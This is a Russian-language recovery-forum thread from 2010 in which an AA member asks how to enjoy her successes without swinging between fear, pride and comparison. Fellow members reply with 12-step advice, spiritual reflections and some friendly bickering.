Всем доброго дня! Очень нужны ваши помощь, советы и поддержка.
За последний год у меня произошли определенные изменения, связанные с работой и вообще родом деятельности. Скажем так: я делаю определенные успехи. И очень благодарна за это ВС. Правда есть одно но.

Не умею просто радоваться успехам. То накатывает страх. Навроде того: "Стоит сейчас чуть подняться, как потом будет больнее падать; обязательно опозоришься; все увидят, что на самом деле ты ничего не знаешь и не умеешь". Либо гордыня и ощущение собственной крутости, от которых меня страшно колбасит и состояние совершенно предсрывное и саморазрушительное. Либо начинаю мерять себя с другими, сравнивать... В общем нет в этом никакой радости, а сплошные качели. Что с этим можно сделать?

Очень надеюсь, что не будете осуждать, потому что я сама себя уже изосуждалась. Что посоветуете? Как найти золотую середину?



Спустя 19 минут, 28 секунд (21.09.2010 - 18:16) pechora написал(а):
Цитата (velosipedistka @ 21.09.2010 - 17:56 )
Что посоветуете? Как найти золотую середину?

Положительные перемены - воспринимай, как нормальные..
Неприятности в игнор.
Все.
Качелек больше нет..))

Спустя 1 минуту, 2 секунды (21.09.2010 - 18:17) гаспар1 написал(а):
velosipedistka привет я Андрей алкоголик
Вопрос традиционный - как часто на группы ходишь?

Цитата (velosipedistka @ 21.09.2010 - 17:56 )
Как найти золотую середину?


Для себя я определил КАК !?, хотя было не просто
Только применяя принципы 12 шагов и традиций АА во всей моей жизни
Другими словами , я в теме 24 часа в сутки


Спустя 3 минуты, 31 секунду (21.09.2010 - 18:20) Nikola написал(а):
Дай себе разрешение РАДОВАТЬСЯ. Если не получается себе разрешить- проблема в детстве. Установка- сильно смеешься, потом плакать будешь. Это не правда. Родители обманули чтоб дитя боялось на ушах стоять. Родителям тогда спокойнее

Спустя 13 минут, 43 секунды (21.09.2010 - 18:34) velosipedistka написал(а):
Цитата (pechora @ 21.09.2010 - 18:16 )
Положительные перемены - воспринимай, как нормальные..
Неприятности в игнор.
Все.
Качелек больше нет..))

В смысле привыкать, что хорошее - это нормально? Кстати, очень простая, но МЫСЛЬ. Типа так и должно быть. Тогда и падать неоткуда, но и гордиться собой вроде как не из-за чего.
Спасибо!

Спустя 4 минуты, 20 секунд (21.09.2010 - 18:38) pechora написал(а):
Цитата (velosipedistka @ 21.09.2010 - 18:34 )
В смысле привыкать, что хорошее - это нормально?

Yes! (от волнения говорит не по-нашему)) ты уловила суть..
Отныне - хорошее, это норма..(читай обещания большой книги..)

Спустя 7 минут, 56 секунд (21.09.2010 - 18:46) velosipedistka написал(а):
Цитата (Nikola @ 21.09.2010 - 18:20 )
Дай себе разрешение РАДОВАТЬСЯ. Если не получается себе разрешить- проблема в детстве. Установка- сильно смеешься, потом плакать будешь. Это не правда. Родители обманули чтоб дитя боялось на ушах стоять. Родителям тогда спокойнее

Ты знаешь, там выше был комментарий и твой вслед за ним - заставили задуматься... Похоже, я в самом деле считаю, что радоваться тому, что получается у меня хорошо, нельзя, потому что это что-то из рук вон выходящее. И вот я делаю хорошо и качественно и сама не могу поверить и отношусь к себе как к невиданной зверюге. А вообще-то это нормально делать свою работу качественно и радоваться этому. Все так просто оказывается.



Спустя 1 минуту, 40 секунд velosipedistka написал(а):
Цитата (pechora @ 21.09.2010 - 18:38 )
Yes! (от волнения говорит не по-нашему)) ты уловила суть..
Отныне - хорошее, это норма..(читай обещания большой книги..)

Я головой как бы понимала и читала, но сейчас, благодаря тебе, начинаю это принимать. Ух ты!



Спустя 3 минуты, 50 секунд velosipedistka написал(а):
Цитата (гаспар1 @ 21.09.2010 - 18:17 )
привет я Андрей алкоголик

Привет, Андрей! Я - Настя. Грешна, на группы хожу нечасто, но так или иначе стараюсь программе уделять время каждый день. Про принципы в своей жизни - абсолютно с тобой согласна! Попробую еще больше вникать.

Спустя 1 минуту, 54 секунды (21.09.2010 - 18:48) pechora написал(а):
Цитата (velosipedistka @ 21.09.2010 - 18:42 )
Ух ты!

У меня зачастую так и происходит.. - приходишь на группу и какая-то мысль из в бесформенных образов превращается в ясную цель.. услышав какую-то фразу.. Ух ты!))
Ты просто была готова это услышать и услышала))..
Не была бы - услышала бы чего нибудь другое, попросила бы тапком кинуть.. biggrin.gif

Спустя 2 минуты, 56 секунд (21.09.2010 - 18:51) velosipedistka написал(а):
Цитата (pechora @ 21.09.2010 - 18:48 )
Ты просто была готова это услышать и услышала))..
Не была бы - услышала бы чего нибудь другое, попросила бы тапком кинуть.. biggrin.gif

Не, тапок хватит уже:))) Спасибо тебе!

Спустя 4 минуты, 34 секунды (21.09.2010 - 18:56) nadenka8791 написал(а):
velosipedistka
привет! Читаю и как будто я писала. Это уже не смешно - вторая тема, как с меня списана. Не "зацепило", а прям под каждым словом подписаться могу. Мы не двойники случайно? Я в шоке! blink.gif

Спустя 2 минуты, 30 секунд (21.09.2010 - 18:58) гаспар1 написал(а):
Цитата (velosipedistka @ 21.09.2010 - 18:46 )
Про принципы в своей жизни - абсолютно с тобой согласна! Попробую еще больше вникать.


user posted image user posted image user posted image

Спустя 9 минут, 5 секунд (21.09.2010 - 19:07) velosipedistka написал(а):
Цитата (Наdenka @ 21.09.2010 - 18:56 )
velosipedistka
привет! Читаю и как будто я писала. Это уже не смешно - вторая тема, как с меня списана. Не "зацепило", а прям под каждым словом подписаться могу. Мы не двойники случайно? Я в шоке! blink.gif

Привет-привет! Нет,мы точно не двойники - я твою фотографию видела только что:))) Видимо, это какие-то общие наши "алкоголические" процессы. Спасибо тебе, что пишешь. Иногда важно понять, что то, что с тобой происходит и у других бывает. Ну и к тому же вместе легче разобраться. Меня зацепило высказывание pechora выше. Посмотри, может, и тебе отзовется. У меня прямо внутри что-то сдвинулось с привычных мест после этого осознания. Хоть и простое оно совсем.



Спустя 5 минут, 3 секунды velosipedistka написал(а):
гаспар1
Спасибо!!

Спустя 9 минут, 29 секунд (21.09.2010 - 19:17) nadenka8791 написал(а):
Цитата
Меня зацепило высказывание pechora выше. Посмотри, может, и тебе отзовется.

Если я скажу, что и меня зацепило, это будет правда. Ужас. Прям можно после каждого высказывания писать: и я, и меня. Я, вот честно, не нарочно и не придумываю. biggrin.gif
Это какой-то фэ-но-мэн, чес сло!

Спустя 15 минут, 21 секунду (21.09.2010 - 19:32) Flyuroza написал(а):
Цитата (velosipedistka @ 21.09.2010 - 17:56 )
Не умею просто радоваться успехам. То накатывает страх. Навроде того: "Стоит сейчас чуть подняться, как потом будет больнее падать; обязательно опозоришься; все увидят, что на самом деле ты ничего не знаешь и не умеешь". Либо гордыня и ощущение собственной крутости, от которых меня страшно колбасит и состояние совершенно предсрывное и саморазрушительное.

Не раз замечала, что мой негатив как раз таки притягиваются моими переживаниями и страхами? Ну вроде как «закон подлости». Страх как будто говорит: «Боишься? Ну, тогда на тебе, получай!»
Просто, думаю нужно начать верить в себя. Нужно чаще радоваться своим успехам, принимать их как должное и не бояться. В принципе тебе уже писали об этом. smile.gif

Спустя 27 минут, 53 секунды (21.09.2010 - 20:00) andi35 написал(а):
Ручеек
Цитата
Ну, прям, Кашпировский.

Печора такой, только в отличии от Кашпировского, говорит совсем мало biggrin.gif

Спустя 6 минут, 10 секунд (21.09.2010 - 20:06) velosipedistka написал(а):
Цитата (Flyuroza @ 21.09.2010 - 19:32 )
Не раз замечала, что мой негатив как раз таки притягиваются моими переживаниями и страхами? Ну вроде как  «закон подлости». Страх как будто говорит: «Боишься? Ну, тогда на тебе, получай!»
Просто, думаю нужно начать верить в себя. Нужно чаще радоваться своим успехам, принимать их как должное и не бояться.  В принципе тебе уже писали об этом. smile.gif

Тоже замечала это про негатив. От этого еще больше страхов:))) С сегодняшнего дня начинаю все хорошее и все успехи воспринимать как норму!)

Спустя 2 часа, 34 минуты, 31 секунду (21.09.2010 - 22:41) Валерий.С написал(а):
Цитата (velosipedistka @ 21.09.2010 - 17:56 )
Что посоветуете? Как найти золотую середину?

Привет.Всё это я нашёл в одной брошюре Мелоди Битти,(День за днём из созависимости),корни
действительно из детства,дисфункциональные отношения в семье,вылились в социум,на работе,
со знакомыми,с близкими,неумение естественно проживать свои чувства и правильно их выражать.
Мне помогает приходить к равновесию выздоравливать вровень с зависимостью и созависимостью,
просто пробовать прожить один день данной установкой,посмотреть на себя,что я делаю не так.
Потом это складывается в опыт и в семье и на работе и с окружением.Найди,не пожалеешь,
там всё это чётко описано и как с этими страхами справляться на практике.

Спустя 24 минуты, 39 секунд (21.09.2010 - 23:05) Rearranger написал(а):
velosipedistka
Если, кто-то расскажет тебе - КАК ее найти - плюнь ему в глаза - ВРЕТ 200%
нельзя найти то, что не терялось......

Неприятности такая же нормальная часть жизни как и приятности - и если застревать только на чем-то Одном - то фига с два будет СЕРЕДИНА! Будет перекос а перекос он от того так и называется, потому что он КОС.....

Спустя 4 минуты, 42 секунды (21.09.2010 - 23:10) Валерий.С написал(а):
Цитата (Rearranger @ 21.09.2010 - 23:05 )
Если, кто-то расскажет тебе - КАК ее найти - плюнь ему в глаза - ВРЕТ 200%

Можно ходить и плеваться как ты,а можно заняться собой)))

Спустя 3 минуты, 4 секунды (21.09.2010 - 23:13) Rearranger написал(а):
Валерий.С
...а можно заняться собой...


ДА! Подстриги ногти на ногах

Спустя 11 минут, 28 секунд (21.09.2010 - 23:24) Валерий.С написал(а):
То,что ты лепишь и есть дисфункциональное,негативное отношение.Можно находить серединку,
а не найти и бац навсегда там оказался!Ты вроде не новичок,впадать в такие крайности,хотя
все мы больные,ничего не попишешь,бывает и у меня.Ты предлагаешь своим постом,остаться
таким навсегда и ничего не делать-вот так предложение?! blink.gif

Спустя 8 минут, 44 секунды (21.09.2010 - 23:33) Rearranger написал(а):
Валерий.С
я просто предложил тебе заняться собой - например подстричь ногти, заметь, всё остальное wink.gif сказал ТЫ, - и это именно тот взгляд которым ТЫ смотришь на мир и оцениваешь его

Спустя 10 минут, 1 секунду (21.09.2010 - 23:43) Rearranger написал(а):
Ладно, Валерий.С, не злись - просто, если долго будешь растягивать "пружинку счастья" - она лопнет и выбьет тебе глаз.... Дуализм, так сказать.

Спустя 52 секунды (21.09.2010 - 23:44) гаспар1 написал(а):
Цитата (Валерий.С @ 21.09.2010 - 23:24 )
,хотя
все мы больные,


нифига , я выздоравливающий

Спустя 1 минуту, 50 секунд (21.09.2010 - 23:46) Rearranger написал(а):
гаспар1
что характерно, я тоже rolleyes.gif

Спустя 9 минут, 28 секунд (21.09.2010 - 23:55) Валерий.С написал(а):
Цитата (Rearranger @ 21.09.2010 - 23:33 )
я просто предложил тебе заняться собой - например подстричь ногти

Ну это же банально,следи за своими ногами,а не за моими.
Цитата (Rearranger @ 21.09.2010 - 23:43 )
не злись - просто, если долго будешь растягивать "пружинку счастья" - она лопнет

Да я не злюсь,у тебя картинка не позволяет)))А помогает реально,глупо тебе судить о том,чего
даже в глаза не видел.И естественно установки на разные чувства,а их очень много и далеко не все хорошие,но проживать вполне возможно,только сегодня)))
Цитата (гаспар1 @ 21.09.2010 - 23:44 )
нифига , я выздоравливающий

Извини,я тоже,но это не говорит о здоровье,сам понимаешь biggrin.gif
Цитата (Ручеек @ 21.09.2010 - 23:30 )
Долго искал?

Бог послал biggrin.gif сразу после РЦ купил в Питере на группе,на ст.Василеостровская,для тебя случайно
конечно.

Спустя 37 минут, 58 секунд (22.09.2010 - 00:33) Лир-ра написал(а):
Вот рекомендации, к выпонению которых я отнеслась очень серьезно и благодаря которым в большинстве случаев смогла сохранить душевный покой который был так мне необходим.
Непосредственно к предложенныс ситуациям:

Цитата (velosipedistka @ 21.09.2010 - 18:56 )
Не умею просто радоваться успехам.

Благодари Бога за все в твоей жизни и твоя радость умножится.
Цитата (velosipedistka @ 21.09.2010 - 18:56 )
"Стоит сейчас чуть подняться, как потом будет больнее падать; обязательно опозоришься; все увидят, что на самом деле ты ничего не знаешь и не умеешь"

Меньше думай. wink.gif Мы планируем действие, а не результат. Моя задача делать ошибки, я не идеальная. biggrin.gif
Цитата (velosipedistka @ 21.09.2010 - 18:56 )
Либо гордыня и ощущение собственной крутости, от которых меня страшно колбасит и состояние совершенно предсрывное и саморазрушительное

Моя трезвость, это не моя заслуга, это Чудо, потому что алкоголик должен пить....
Цитата (velosipedistka @ 21.09.2010 - 18:56 )
Либо начинаю мерять себя с другими, сравнивать... В общем нет в этом никакой радости, а сплошные качели. Что с этим можно сделать?

Не в коем случае не ругать себя и не сравнвать ни с кем.( это прерагатива Бога smile.gif )
Мне помогает, если применяю как таблетки, строго по рецепту. cool.gif

Спустя 7 минут, 17 секунд (22.09.2010 - 00:41) nadenka8791 написал(а):
Лир-ра
Мне оказалось полезно почитать твои рекомендации. Очень на душу легло. Спасибо!

Спустя 5 минут, 3 секунды (22.09.2010 - 00:46) velosipedistka написал(а):
Лир-ра Вот это СПАСИБО тебе!!! Все очень верно и все "ложится" на то, как чувствую и как бы хотелось жить.

Спустя 4 минуты, 4 секунды (22.09.2010 - 00:50) Лир-ра написал(а):
Цитата (Наdenka @ 22.09.2010 - 01:41 )
Мне оказалось полезно почитать твои рекомендации. Очень на душу легло. Спасибо!

Это не мои , это програмные рекомендации. biggrin.gif
А вообще пользуйтесь девочки на здоровье, даром получила, даром отдаю... biggrin.gif laugh.gif

Спустя 6 минут, 32 секунды (22.09.2010 - 00:56) nadenka8791 написал(а):
Лир-ра
Спасибо. В программе не всегда увидишь, что в данной ситуёвине надо. А ты чётко указала именно на то, что теперь кажется очевидным. Ой, сама запуталась. Та самая ситуация, когда кажется, что сама могла б легко догадаться. В общем здорово. Я часто чувствую, что очень зашорена и не вижу дальше своего носа.

Спустя 7 часов, 44 минуты, 12 секунд (22.09.2010 - 08:40) Мейсон написал(а):
я не читал всю тему, просто про себя скажу. в чем для меня золотая середина? это я сам, любовь к себе самому.
когда я хочу повыпендриваться - это значит я не люблю себя и мне требуется за счет других повысить свою самооценку. унизив другого вроде сам выше себя чувствуешь ohmy.gif
когда я боюсь чужой оценки, отторжения, усмешки - это опять я не люблю себя, не уверен в себе.
все это лишь является лакмусовой бумажкой, показателем того что нужно обратить внимание на себя. могу я делать только то что хочу я? могу. а могу я изменить мысли других людей? нет, ну и пускай думают что хотят. я не могу их изменить.

Спустя 6 минут, 37 секунд (22.09.2010 - 08:47) СВВ написал(а):
Мейсон
Вот! Вот! До меня только недавно дошло, что чужие мысли я не могу изменить, что творится у другого в голове тоже не знаю.
Стало так хорошо...Но доходило очень долго, да и все еще доходит.

Спустя 1 час, 35 минут, 7 секунд (22.09.2010 - 10:22) Rearranger написал(а):
Валерий.С
ни хрена ты не понял, ну да и ВС с тобой....

Спустя 19 минут, 55 секунд (22.09.2010 - 10:42) stariik написал(а):
Мне помогает в таких случаях 3 шаг ....Эт Верхняя сила мне дает помощь в чем то преуспеть и я за это ее благодарю.
А радоваться я себе просто разрешил без авсяких там печалей так как все что происходит со мной - все с верху от Него .А от Него разве может быть что то плохое????
Да и потом после препоручения мне стало гораздо легче жить так как сейчас самому не надо рулить а просто делать то что мне необходимо и при этом не забывать говорить что - Да исполниться Твоя воля а не моя...ВОТТ rolleyes.gif

Спустя 1 час, 33 минуты, 15 секунд (22.09.2010 - 12:15) Rearranger написал(а):
Лир-ра
я конечно ОЧЕНЬ извиняюь но "алкоголик должен пить.... " КОМУ? ЗАЧЕМ и СКОЛЬКО? В смысле должен...?

Спустя 8 минут, 38 секунд (22.09.2010 - 12:24) Morsla написал(а):
Лир-ра
Спасибо..

Спустя 17 минут, 20 секунд (22.09.2010 - 12:41) Лир-ра написал(а):
Цитата (Rearranger @ 22.09.2010 - 13:15 )
я конечно ОЧЕНЬ извиняюь но "алкоголик должен пить.... " КОМУ? ЗАЧЕМ и СКОЛЬКО? В смысле должен...?

Диобетик то же никому не должен ,он просто болен....
Ну и соответственно алкоголик ... это формулировка такая -Алкоголик должен пить., а если не пьет ,это не что иное , как чудо.....smile.gif .Болезнь хроничесская, прогресирующая и смертельная.
П.С . Я не сильна в словесех, но думаю и так все понятно.

Спустя 11 минут, 5 секунд (22.09.2010 - 12:52) alles написал(а):
Всю жизнь "качели" присутствуют. Как не пытался, но ровно жить не получается. Правда со временем уже не страшно раскачиватся на полную катушку... привыкаешь...

Спустя 7 минут, 7 секунд (22.09.2010 - 12:59) Nikola написал(а):
Цитата (alles @ 22.09.2010 - 13:52 )
Всю жизнь "качели" присутствуют. Как не пытался, но ровно жить не получается. ь...

Они потом проходят. всему свое время, а какое-то время качели помогали не уснуть в оглоблях.

Спустя 4 минуты, 5 секунд (22.09.2010 - 13:04) alles написал(а):
Цитата (Nikola @ 22.09.2010 - 12:59 )
Они потом проходят. всему свое время

и смерть наступает biggrin.gif

Спустя 2 минуты, 18 секунд (22.09.2010 - 13:06) Rearranger написал(а):
Nikola
100% - пока нарабатывается опыт - качели воспринимаются как качели, потом намано - все правильно становится. И хорошо и плохо, и нормально - ВСЁ ВМЕСТЕ - норма, каждое состояние правильно и нормально. А ежели пыжиться и тужиться всё время быть в хорошо - то шарахнет в итоге ровно пропорционально потугам. Эти потуги такое же своеволие и глупость, как и алкогольные попытки быть центром вселенной. на самом деле - нету никаких качелей - все в голове.

alles все помрем - 500%

Спустя 48 секунд (22.09.2010 - 13:07) Nikola написал(а):
Цитата (alles @ 22.09.2010 - 14:04 )
]
и смерть наступает biggrin.gif

Ее ваще не существует. Есть Сущий и не-сущий. смерть-это во владении не сущих

Спустя 2 минуты, 54 секунды (22.09.2010 - 13:10) alles написал(а):
Цитата (Nikola @ 22.09.2010 - 13:07 )
Ее ваще не существует

Страна как раз в таких Матросовых и нуждается... Я уже и амбразурку знаю достойную.... biggrin.gif

Спустя 2 минуты, 19 секунд (22.09.2010 - 13:12) Nikola написал(а):
Цитата (alles @ 22.09.2010 - 14:10 )
[
Страна как раз в таких Матросовых и нуждается... Я уже и амбразурку знаю достойную.... biggrin.gif

В этом нуждается не только страна. но и каждый человек. В двэрцятах через которые в жизнь выходят

Спустя 3 минуты, 48 секунд (22.09.2010 - 13:16) Nikola написал(а):
Для меня однозначно не существует

Спустя 18 секунд (22.09.2010 - 13:16) Rearranger написал(а):
Причем тут Матросовы? blink.gif
Личность - навязанный социумом стереотип

Спустя 2 минуты, 11 секунд (22.09.2010 - 13:18) Rearranger написал(а):
Nikola
не получится объяснить, там слишком много надо в сознании менять ....

Спустя 2 минуты, 34 секунды (22.09.2010 - 13:21) Nikola написал(а):
Есть разные личности. Личность- это хорошо..личностный аспект. и есть те кто стремиться раствориться в брахмане. как капля в море. а есть те кто соединяясь с морем не теряют индивидуальность



Спустя 1 минуту, 27 секунд Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:17 )
Цитата (Nikola @ 22.09.2010 - 13:16 )
Для меня однозначно не существует

Блажен кто верует.

Это уже не вера для меня даже. Я УЖЕ ЗНАЮ.

Спустя 2 минуты, 3 секунды (22.09.2010 - 13:23) Rearranger написал(а):
Nikola
ну да, сначала были горы и небо, потом это исчезло, а потом опять появилось небо и горы wink.gif

Спустя 3 минуты, 1 секунду (22.09.2010 - 13:26) Morsla написал(а):
Rearranger
Ты антидепрессант сам по себе... Надо тебя Запатентовать. Что скажешь?

Спустя 1 минуту, 1 секунду (22.09.2010 - 13:27) Nikola написал(а):
Цитата (Rearranger @ 22.09.2010 - 14:23 )
Nikola
ну да, сначала были горы и небо, потом это исчезло, а потом опять появилось небо и горы  wink.gif

И утыкались горы морквой, и увидели что это хорошо. да будет морква- и стал морква. Из морквы все начало быть. и без него ничего начало быть что начало быть. А почему так? Ибо восхотели так те кто горы морквами утыкал

Спустя 5 минут, 50 секунд (22.09.2010 - 13:33) Валерий.С написал(а):
Цитата (Rearranger @ 22.09.2010 - 13:06 )
А ежели пыжиться и тужиться всё время быть в хорошо -

Вот именно,всё естественно,достаточно это проживать,анализировать и отпускать ситуёвину,
извлекая урок,и видеть не единственный выход-это алкогольное мышление,что выхода нет
или только такой,какой я себе рисую.Качели естественно регулируются опытом,если считаюсь
не только со своим,и не только своим пользуюсь,то и результат эффективнее.Я не пуп земли
и вокруг меня тоже люди.

Спустя 3 минуты, 16 секунд (22.09.2010 - 13:36) Nikola написал(а):
Цитата (Валерий.С @ 22.09.2010 - 14:33 )
.Я не пуп земли
и вокруг меня тоже люди.

Маленькое противоречие..люди не вокруг тебя. они по разному

Спустя 1 минуту, 14 секунд (22.09.2010 - 13:37) Rearranger написал(а):
Morsla
я еще и эндорфин biggrin.gif естественный rolleyes.gif

Спустя 15 минут, 23 секунды (22.09.2010 - 13:53) Лир-ра написал(а):
Цитата (Nikola @ 22.09.2010 - 14:27 )
И утыкались горы морквой, и увидели что это хорошо. да будет морква- и стал морква. Из морквы все начало быть. и без него ничего начало быть что начало быть. А почему так? Ибо восхотели так те кто горы морквами утыкал

Шура, я валяюсь..!!! user posted image



Спустя 2 минуты, 3 секунды Лир-ра написал(а):
Цитата (Rearranger @ 22.09.2010 - 14:37 )
Morsla
я еще и эндорфинестественный

И каратин.... biggrin.gif laugh.gif

Спустя 11 минут, 36 секунд (22.09.2010 - 14:04) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:37 )
Валерий.С
Ты прям как Горбачев говоришь. Когда видишь твой текст, то уже понимаешь, что его много, но там - ничего нет.

Эт кому как..лично для меня- есть



Спустя 1 минуту, 55 секунд Nikola написал(а):
Цитата (Лир-ра @ 22.09.2010 - 14:53 )



[h
я еще и эндорфинестественный [/QUOTE]
И каратин.... biggrin.gif laugh.gif

Как естественное слабительное. Лучше, чем естественно напрягательное rolleyes.gif



Спустя 8 минут, 29 секунд Nikola написал(а):
Из всего написанного про золотую средину я сделал выводы:
1. Шибко не надо напрягаться в поисках той самой середины.
2.Устанавливается путем переколбашивания с одного косяка в другую.
3.Величина не статическая. Что вчера было срединой- сегодня может быть косяком.
4.Эти факторы следует учитывать в отношениях, чтоб не тащить других с свою золотую средину. Дать себе разрешение меняться. а значит перестать требовать от других соответствия моим критериям ценностей
5.Стараться придерживаться этой средины по правилу только сегодня, зная о своем несовершенстве. Ибо в нем и есть мое совершенство- в способности к совершенствованию.

Спустя 8 минут, 21 секунду (22.09.2010 - 14:12) Nikola написал(а):
Понял. А как же

Спустя 9 минут, 50 секунд (22.09.2010 - 14:22) Валерий.С написал(а):
Цитата (Nikola @ 22.09.2010 - 13:36 )
Маленькое противоречие..люди не вокруг тебя. они по разному

Это и так и нет,я хорошо понимаю,что каждый живёт свою жизнь,а не мою и мне реально
жить свою жизнь,а не чью то.Но социальная часть меня говорит мне о том,что я не монах.
К тому же считаться с другими и стараться видеть их правду,вместо тупого отрицания
помогает и мне не чувствовать себя не в своей тарелке.Отрицание самая ненадёжная защита
и кратковременная.Люди живут по разному,но не по одиночке.

Спустя 33 секунды (22.09.2010 - 14:23) Morsla написал(а):
Rearranger
Цитата
Morsla
я еще и эндорфин biggrin.gif естественный rolleyes.gif

Ну ка поди сюда... biggrin.gif biggrin.gif biggrin.gif

Спустя 10 минут, 44 секунды (22.09.2010 - 14:34) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:20 )
  Это очень ценное качество.

Спасибо



Спустя 3 минуты, 51 секунду Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:26 )
[



"Человек рождается один и умирает один". (не моя цитата).



Вот почему в такой момент человек нуждается в Том, Кто будет ВМЕСТЕ с ним, а не просто рядом. Быть рядом с кем-то и вместе- не одно и то же. А исход одинокий- страшен, если НИКОГО не будет вместе... unsure.gif

Спустя 2 минуты, 17 секунд (22.09.2010 - 14:36) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:37 )
Ты прям как Горбачев говоришь. Когда видишь твой текст, то уже понимаешь, что его много, но там - ничего нет

Там много чего есть и Валерий знает о чем говорит,
как не странно ,я то же понимаю о чем он.
Единственное ,что такие вещи можно понять если действительно очень захотеть и приложить к этому усилия,
духовный труд, а вот так с ходу конечно невъедешь, а раз непонятно ,
то нафик все обесценить.
Я один знаю все и я один мера вещей! user posted image

Спустя 7 минут, 50 секунд (22.09.2010 - 14:44) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:38 )
А ]
Именно. Ты все понял. Только бог - это эфемерность.

А кокой смысл ты вкладываешь в слово эфемерность? Типа несуществующий или что-то другое?

Спустя 16 минут, 27 секунд (22.09.2010 - 15:00) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:49 )
Nikola
Я хотел сказать, что по любому - есть он или нет, для меня он эфемерен. Для МЕНЯ - его - нет. Вот и все.


Твое право. Но я думаю ты веришь в его существование, просто выключил его как лампочку в своей жизни..если так тебе лучше...мне по другому.

Спустя 3 минуты, 6 секунд (22.09.2010 - 15:03) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:49 )
Вообщем, мне по большому счету это - до лампочки.

Мне раньше то же было до бога, так же как и ему до меня (те мои мысли),
но когда болезнь придавила, и небо с овчинку показалось,
появилась надежда ,что только он мне сможет помочь,
пришлась смирить свое вселенское Я на сколько могла и попросить помощи , а получив ее,
сделала для себя вывод , я если меняю, что то в себе ,меняется мир вокруг и мое видение его.

Спустя 16 минут, 20 секунд (22.09.2010 - 15:20) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 16:17 )
я уже вышел из того возраста - когда просто верят. Вот и все.

А сколько тебе лет если не секрет? biggrin.gif

Спустя 10 минут, 23 секунды (22.09.2010 - 15:30) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 16:19 )
Не от любви вселенской к нему пришла,

Да я смертельно больной человек, у меня гордыни и еще всякого г..на выше крыше, но знаю людей чистых и хороших которые именно по зову сердца пришли.
Цитата (Ручеек @ 22.09.2010 - 16:19 )
А чего же он другим миллионамсикстилионам не помог? Или ты хочешь сказать, что ты лучше их? Бред.

   

Нет, я не как не лучше, просто не каждый может гордыню свою себе в одно место засунуть и обратиться за помощью, ну и конечно желание изменить свою жизнь и еще усилия, ведь не себя ни Бога не обманешь.



Спустя 2 минуты, 56 секунд Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 16:21 )
И вообще я имел в виду не биологический возраст.

О , мне в 28 казалось что мне 98, а теперь в 40, я чувствую, что жинь только начинается и все самое прекрасное у меня впереди...
Цитата (Ручеек @ 22.09.2010 - 16:21 )
Фото в "обо всем" - имеется.

Пойду гляну smile.gif

Спустя 5 часов, 13 минут, 6 секунд (22.09.2010 - 20:43) velosipedistka написал(а):
Какие мы тут высокодуховные товарищи собрались:) А если серьезно, вы все мне очень помогли. Каждый привнес что-то свое и все важное.
Я сначала напряглась, когда препирательства увидела, почему-то у меня в АА всегда на это стойка, глупое максималистское такое: "здесь такого не должно быть". Но всюду жизнь:) И раз уж хорошее отныне норма, то и любые несогласия, прояснения и в принципе эмоции - тоже нормально.
Вот кстати тоже тема: как не навязывать другому свою правду, а позволять каждому иметь свое мнение.
В общем СПАСИБО! Странно так, что для многих алкоголизм чуть не благом ведь обернулся, толчком к росту.
Трезвая сегодня - ура!))

Спустя 1 минуту, 17 секунд (22.09.2010 - 20:44) Валерий.С написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:19 )
я уже вышел из того возраста - когда просто верят. Вот и все.

Ты просто не дожил до того возраста,хотя дело не возрасте а в состоянии.Я раньше на пальцах мог сосчитать сколько раз меня просто не должно было быть,давно сбился со счёту.Будь честней,
назовись отрицанием,Ручеек нечто милое и спокойное,парадоксально звучит по отношению
к тебе,мой кумир)))Благодаря тебе я знаю каким нельзя быть,чтобы оставаться чистым и трезвым.
Твой опыт,бесценен,образец чего не надо делать biggrin.gif biggrin.gif biggrin.gif

Спустя 34 минуты, 24 секунды (22.09.2010 - 21:19) pechora написал(а):
Цитата (velosipedistka @ 22.09.2010 - 20:43 )
как не навязывать другому свою правду, а позволять каждому иметь свое мнение.

А ты где вообще, на каком шаге? Ну чтоб оперировать понятными словами)))

Спустя 3 минуты, 54 секунды (22.09.2010 - 21:23) velosipedistka написал(а):
Цитата (pechora @ 22.09.2010 - 21:19 )
А ты где вообще, на каком шаге? Ну чтоб оперировать понятными словами)))

На третьем) Но если что, я понятливая)))

Спустя 19 минут, 9 секунд (22.09.2010 - 21:42) pechora написал(а):
Цитата (velosipedistka @ 22.09.2010 - 21:23 )
На третьем) Но если что, я понятливая)))

Понятно, спасибо..))
Тык вот:))
Проводя инвентаризацию по четвертому шагу..я заметил, что одни и те же свойства моего характера в разных ситуациях выступают то как недостатки, то как достоинства..
Из этого наблюдения, признанные гении, типа Энштейна)), сразу выводят теорию относительности всего и вся..))
Терь ты, как человек понятливый), можешь с легкостью отказаться от насильственного навязывания другому человеку твоего видения правды, как занятию в сущности ничего не меняющему..
Как я, так и ты, так и он будем видеть свою правду, и будем равноудалены от истины))
Но если ты покажешь тому человеку, что имея такое мировоззрение как у тебя, можно достичь лучших результатов, то он сам поменяет свою точку обзора на твою)).. без видимых усилий с твоей стороны..

Спустя 48 минут, 51 секунду (22.09.2010 - 22:31) Валерий.С написал(а):
Цитата (pechora @ 22.09.2010 - 21:42 )
Как я, так и ты, так и он будем видеть свою правду, и будем равноудалены от истины))
Но если ты покажешь тому человеку, что имея такое мировоззрение как у тебя, можно достичь лучших результатов, то он сам поменяет свою точку обзора на твою)).. без видимых усилий с твоей стороны..

Точно так,и для этого нужно время,время терпимости.Заботиться о себе,своём росте-это труд
над собой во взаимоотношениях и тут часть СОЦИО нуждается в тренировках.Танец на граблях.

Спустя 9 минут, 13 секунд (22.09.2010 - 22:40) velosipedistka написал(а):
pechora
Валерий.С
Да, согласна. Печора, эту самую инвентаризацию я уже провожу тоже. Можно интересно делать одновременно два шага?))) Сама понимаю, что нельзя. Но так или иначе мысли и анализ того, как и с кем за жизнь приходилось взаимодействовать, в чем моя вина и кому принесла вред - все это приходит и есть.
